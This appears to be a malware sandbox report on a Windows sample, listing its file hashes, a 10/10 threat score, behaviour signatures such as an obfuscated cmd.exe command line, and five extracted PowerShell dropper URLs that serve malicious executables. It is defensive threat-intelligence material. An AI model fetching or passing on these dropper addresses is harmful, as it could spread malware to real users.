General

  • Target

    6875b798bfba769e6e387e8aabc4664c_JaffaCakes118

  • Size

    127KB

  • Sample

    240522-yvs5wseg77

  • MD5

    6875b798bfba769e6e387e8aabc4664c

  • SHA1

    dfbb786f06af128ab2666e08a9107d689c8d4cd5

  • SHA256

    c8ba54b0b471caa0194f8739d386aff5ebdb3e7213bc8f2d14424c18fcf5608b

  • SHA512

    2f397a950f907348872d5626040a23af17e0a749b2a2badb65be43fa77c430ac2fb10a2b46ef7e3fe943cbf2d53f86398a74db8eca669e452a6425fbd88ccb52

  • SSDEEP

    1536:nptJlmrJpmxlRw99NBc+aS2T+75RnuwACdRR2XGUggBlpF7xpy7RMANuk:pte2dw99fbtRIWwYMKuk

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://hollywoodgossip.biz/GpyDtTIIO1

exe.dropper

http://charpentier-couvreur-gironde.com/2Agu5kOrh7

exe.dropper

http://surprise-dj-team.com/2Atuefrxm

exe.dropper

http://spektramaxima.com/IXx8GGy

exe.dropper

http://dc.amegt.com/wp-content/QNhKWYE

Targets

    • Target

      6875b798bfba769e6e387e8aabc4664c_JaffaCakes118

    • Size

      127KB

    • MD5

      6875b798bfba769e6e387e8aabc4664c

    • SHA1

      dfbb786f06af128ab2666e08a9107d689c8d4cd5

    • SHA256

      c8ba54b0b471caa0194f8739d386aff5ebdb3e7213bc8f2d14424c18fcf5608b

    • SHA512

      2f397a950f907348872d5626040a23af17e0a749b2a2badb65be43fa77c430ac2fb10a2b46ef7e3fe943cbf2d53f86398a74db8eca669e452a6425fbd88ccb52

    • SSDEEP

      1536:nptJlmrJpmxlRw99NBc+aS2T+75RnuwACdRR2XGUggBlpF7xpy7RMANuk:pte2dw99fbtRIWwYMKuk

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • An obfuscated cmd.exe command-line is typically used to evade detection.

MITRE ATT&CK Enterprise v15

Tasks